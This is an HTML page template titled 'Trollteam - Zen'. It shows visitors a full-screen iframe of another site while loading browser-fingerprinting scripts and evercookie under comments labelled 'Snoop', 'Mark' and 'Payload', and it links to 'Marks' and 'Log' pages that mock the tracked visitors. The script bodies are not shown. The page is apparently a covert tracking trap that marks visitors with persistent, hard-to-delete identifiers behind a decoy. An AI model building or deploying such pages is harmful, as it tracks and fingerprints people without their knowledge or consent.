<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta charset="UTF-8">
    <title>Trollteam - Zen</title>
    <link href="css/buttons.css" rel="stylesheet" type="text/css">

</head>
<body>
    <!-- Snoop -->
    <script src="js/json2.js"></script>
    <script src="js/modernizr.js"></script>
    <script src="js/font-detector.js"></script>
    <script src="js/font-list.js"></script>
    <script src="js/compfields.js"></script>
    <!-- Mark -->
    <script type="text/javascript" src="js/swfobject-2.2.min.js"></script>
    <script src="js/evercookie.js"></script>
    <!-- Zen -->
    <iframe src="http://zenrus.ru"
            hspace='0' vspace='0' height='100%' width='100%'
            style='position: absolute; top: 0; left: 0;'></iframe>
    <!-- Mark + csrf -->
    <input id='mark' type='hidden' value='{0}'>
    <!-- input id='csrf' type='hidden' value='1' -->
    <!-- Navigation -->
    <ul id='buttons'>
        <li><a href="#" class="round green">Home<span class="round">You're here</span></a></li>
        <li><a href="marks" class="round red">Marks<span class="round">Wanna see your "tatoos"?))</span></a></li>
        <li><a href="log" class="round yellow">Log<span class="round">Find yourself here...</span></a></li>
    </ul>
    <!-- Payload -->
    <script src="js/snoop.js"></script>
    <script src="js/markbomb.js"></script>
</body>
</html>
